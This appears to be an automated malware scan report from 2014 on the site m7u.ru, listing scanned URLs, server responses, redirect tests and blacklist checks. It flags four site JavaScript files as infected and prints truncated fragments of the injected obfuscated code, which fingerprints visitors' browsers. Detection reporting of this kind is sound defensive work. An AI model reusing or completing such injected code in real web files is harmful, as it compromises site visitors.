Scanned pages/files
| Request | Server response | Status |
http://m7u.ru/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:11 GMT Location: http://www.m7u.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://www.m7u.ru/ | 200 OK Content-Length: 58128 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js | 200 OK Content-Length: 66079 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://www.m7u.ru/modules/mod_jt_slideshow/scripts/jquery.cycle.all.min.js | 200 OK Content-Length: 30567 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo Antivirus reports:
| ||
http://www.m7u.ru/modules/mod_jt_slideshow/scripts/jquery.easing.1.3.js | 200 OK Content-Length: 9867 Content-Type: application/x-javascript | clean |
http://www.m7u.ru/modules/mod_jt_slideshow/scripts/jquery.easing.compatibility.js | 200 OK Content-Length: 3496 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo return jQuery.easing.easeOutElastic(x, t, b, c, d); }, elasinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutElastic(x, t, b, c, d); }, backin: function(x, t, b, c, d) { return jQuery.easing.easeInBack(x, t, b, c, d); }, backout: function(x, t, b, c, d) { return jQuery.easing.easeOutBack(x, t, b, c, d); }, backinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutBack(x, t, b, c, d); } }); Antivirus reports:
| ||
http://www.m7u.ru/templates/jv_mojow/js/jv.script.js | 200 OK Content-Length: 3045 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo settings['colors'] = jvpathcolor + 'green.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} if($('jvcolor3')){$('jvcolor3').addEvent('click', function(e) { e = new Event(e).stop(); if (style_1) style_1.remove(); new Asset.css(jvpathcolor + 'red.css', {id: 'red'}); style_1 = $('red'); settings['colors'] = jvpathcolor + 'red.css'; StyleCookie.empty(); StyleCookie.extend(settings); });} }); Antivirus reports:
| ||
http://m7u.ru/plugins/system/CssJsCompress/js.php?js=8e28ca95f9cae74c4ce2a900bee52c7f.js | 200 OK Content-Length: 60450 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function batuuedpro(){ var glyRosmenTa = ['iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMo } el.vml.image.shape.fillcolor = 'none'; el.vml.image.fill.type = 'tile'; el.vml.color.fill.on = false; lib.attachHandlers(el); lib.giveLayout(el); lib.giveLayout(el.offsetParent); lib.applyVML(el); } }; try { document.execCommand("BackgroundImageCache", false, true); } catch(r) {} ie_png.createVmlNameSpace(); ie_png.createVmlStyleSheet(); Antivirus reports:
| ||
http://jd.revolvermaps.com/r.js | 200 OK Content-Length: 2365 Content-Type: application/javascript | clean |
http://counter.rambler.ru/top100.jcn?2471059 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://m7u.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:14 GMT Location: http://www.m7u.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://www.m7u.ru/test404page.js | 404 Not Found Content-Length: 20891 Content-Type: text/html | clean |
http://www.m7u.ru/js/jquery/jquery-1.4.4.min.js | 404 Not Found Content-Length: 20891 Content-Type: text/html | clean |
http://www.m7u.ru/js/site_navigation.js | 404 Not Found Content-Length: 20891 Content-Type: text/html | clean |
http://www.m7u.ru/js/ | 404 ÐÐ¾Ð¼Ð¿Ð¾Ð½ÐµÐ½Ñ Ð½Ðµ найден Content-Length: 1844 Content-Type: text/html | clean |
http://www.m7u.ru/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:15 GMT Location: http://www.m7u.ru/ Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://m7u.ru/component/user/register.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 24 Jun 2014 23:29:15 GMT Location: http://www.m7u.ru/component/user/register.html Server: nginx Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.28 | clean |
http://www.m7u.ru/component/user/register.html | 200 OK Content-Length: 40816 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: m7u.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Jun 2014 23:29:11 GMT
Location: http://www.m7u.ru/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
...0 bytes of data.
GET / HTTP/1.1
Host: m7u.ru
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 24 Jun 2014 23:29:11 GMT
Location: http://www.m7u.ru/
Server: nginx
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.28
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: m7u.ru
Referer: http://www.google.com/search?q=m7u.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: m7u.ru
Referer: http://www.google.com/search?q=m7u.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=m7u.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://m7u.ru/
Result: m7u.ru is not infected or malware details are not published yet.
Result: m7u.ru is not infected or malware details are not published yet.